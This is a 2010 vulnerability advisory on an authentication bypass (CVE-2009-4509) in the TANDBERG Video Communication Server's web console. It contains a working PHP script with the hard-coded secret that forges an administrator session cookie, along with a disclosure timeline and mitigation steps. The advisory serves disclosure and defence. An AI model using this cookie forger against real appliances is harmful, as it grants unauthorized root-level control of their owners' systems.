TANDBERG VCS
Authentication Bypass

Release Date 2010-04-09
Product Video Communication Server (VCS)
Versions x4.2.1 and possibly earlier
Severity Critical
Discovered by Jon Hart and Timothy D. Morgan
Advisory by Timothy D. Morgan <tmorgan (at) vsecurity.com>
Vendor Status Update released (without security advisory) on October 9, 2009
CVE Candidate CVE-2009-4509
Reference Original Advisory

Product Description

From [1]:

"The Video Communication Server (VCS) is an integral part of the TANDBERG Total Solution and is the center of the video communications network, connecting the benefits of video conferencing and telepresence to other communications environments including unified communications and IP Telephony networks."

Vulnerability Overview

On December 2nd, VSR identified an authentication bypass vulnerability in TANDBERG's Video Communication Server, firmware version x4.2.1. This vulnerability allows for the complete bypass of authentication in the administrative web console. Since this web interface can be used to execute arbitrary code on the appliance as root (via software updates), the severity is considered critical.

Product Background

The TANDBERG Video Communication Server is a Linux-based appliance which supports the interoperation of a plethora of video and voice communications devices. The VCS provides a web-based management interface implemented in PHP which allows administrators to perform a wide variety of actions, including configuration of the device, management of user accounts, firmware updates, along with number of other items.

Vulnerability Details

The TANDBERG VCS web management interface utilizes custom cookies for the purpose of session management. In version x4.2.1 of the appliance firmware (and possibly earlier versions), it is possible to forge session cookies with relatively little knowledge of the appliance's configuration.

The vulnerability lies in the files located at the following paths:

  /tandberg/web/lib/secure.php
  /tandberg/web/user/lib/secure.php

Routines in these files generate user session cookies in roughly the following way:

SECRET = SERVER_ADDRESS + STATIC_VALUE
HASH   = md5(USERNAME + SECRET + CLIENT_ADDRESS + CURRENT_TIME)
COOKIE = USERNAME + ACCESS_RIGHTS + CLIENT_ADDRESS + CURRENT_TIME + HASH

In the above pseudocode, the SERVER_ADDRESS represents the VCS system's IP address, STATIC_VALUE represents a fixed string which is hard-coded into the application source, USERNAME is the authenticated user name, CLIENT_ADDRESS is the IP address of the user's system, CURRENT_TIME is a simple UNIX time stamp, and ACCESS_RIGHTS is an integer denoting the level of access assigned to the user.

Note, that none of the information above is difficult to guess. Any owner of a TANDBERG VCS would have access to the STATIC_VALUE (and in fact, this value is contained in the firmware updates). All TANDBERG appliances have a default user name of "admin" which has full privileges. Therefore, it is possible with a simple PHP script to forge new cookies and access the administrative interface:

// NOTE: Portions of the following code are Copyright (C) 2009 TANDBERG //
function objectToCookie($obj)
{
        $cookie = serialize($obj);
        $cookie = gzcompress($cookie);
        $cookie = base64_encode($cookie);
        return $cookie;
}

function genCookie($server_addr, $remote_addr)
{
        $user_name = "root";
        $secret = $server_addr . "139EF012B6A714A3BE0A867616C7F8";
        $time = time()+24*60*60;
        $id_hash = md5($user_name . $secret . $remote_addr . $time);
        $access = 1; // ReadWrite

        $login_cookie =
            array( "user_name" => $user_name,
                   "access" => $access,
                   "id_hash" => $id_hash,
                   "ip" => $remote_addr,
                   "time" => $time
                   );

        return objectToCookie($login_cookie);
}

print "Cookie: tandberg_login=" 
      . urlencode(genCookie("{{SERVER_IP}}", "{{CLIENT_IP}}")) 
      . "\n";

// end of script //

TANDBERG released firmware version x4.3.0 which corrects this issue on October 9, 2009 (prior to discovery of the vulnerability by VSR). The release notes for this updated version contain a description of the issue:

"Improved the security of the web interface to ensure that the system will not, under any circumstances, allow an authenticated user to escalate their session to more advanced privileges [Ref # 65050]."

However, VSR felt this does not adequately describe the problem. Clearly, as the above exploit and pseudocode demonstrate, it would be possible to alter an existing login session cookie to provide elevated "access" values without updating the MD5 hash, since this value isn't included when the hash is generated. However, the larger issue is that cookies can be forged from scratch without an existing session.

In addition to this lack of clarity, no apparent security advisory for this issue was released to the public via the normal channels (nor was it recorded in the CVE as of this writing). Therefore, VSR felt it is in the public interest to shed further light on the problem.

Versions Affected

VSR has successfully exploited this issue in version x4.2.1. Earlier versions may also be affected. Version x4.3.0 corrects the problem through use of a random secret and the inclusion of the "access" value in the hash.

Vendor Response

The following timeline details TANDBERG's response to the reported issue:

2009-12-09 Preliminary notice to TANDBERG. TANDBERG responded immediately.
2009-12-22 VSR provided TANDBERG a draft advisory.
2009-12-28 TANDBERG confirmed that this issue was corrected in version x4.3.
2010-04-07 TANDBERG VCS firmware version x5.1.1 released which corrected other flaws identified by VSR.
2010-04-09 VSR advisory released.

Recommendation

Upgrade to firmware version x4.3.0 (or newer) as soon as possible. If this is not immediately possible, temporary mitigation could be achieved by changing the "$this->secret" constant in the following files to something unpredictable:

  /tandberg/web/lib/secure.php
  /tandberg/web/user/lib/secure.php

Note that other vulnerabilities were identified in firmware versions prior to x5.1.1. Therefore, upgrading to this version is recommended. See CVE-2009-4510 and CVE-2009-4511 for more information.

Common Vulnerabilities and Exposures (CVE) Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2009-4509 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

Acknowledgements

Thanks to TANDBERG for the quick initial response and cooperation.


References

1. TANDBERG - Video Communication Server
http://www.tandberg.com/video-conferencing-network-infrastructure/video-communication-server.jsp
2. TANDBERG VCS Firmware Downloads
http://ftp.tandberg.com/pub/software/vcs/
3. TANDBERG VCS Version x4 Software Release Notes
http://ftp.tandberg.com/pub/software/vcs/TANDBERG%20Video%20Communication%20Server%20Software%20Release%20Notes%20(X4).pdf

Copyright © 2009,2010 Virtual Security Research, LLC. All rights reserved.

2014-09-17
Apple iOS / OSX: Foundation NSXMLParser XXE Vulnerability

2014-05-20
XML Schema, DTD, and Entity Attacks

2013-06-19
IBM WebSphere Commerce: Encrypted URL Parameter Vulnerable to POA

2012-10-23
Timothy D. Morgan presents No Crack Required: Cryptanalysis in Real-World Applications at OWASP AppSecUSA 2012.

more...

Contact us by phone,
fax or e-mail:

Phone: 617.933.8919
Fax: 617.933.8920
Email: inquiry@vsecurity.com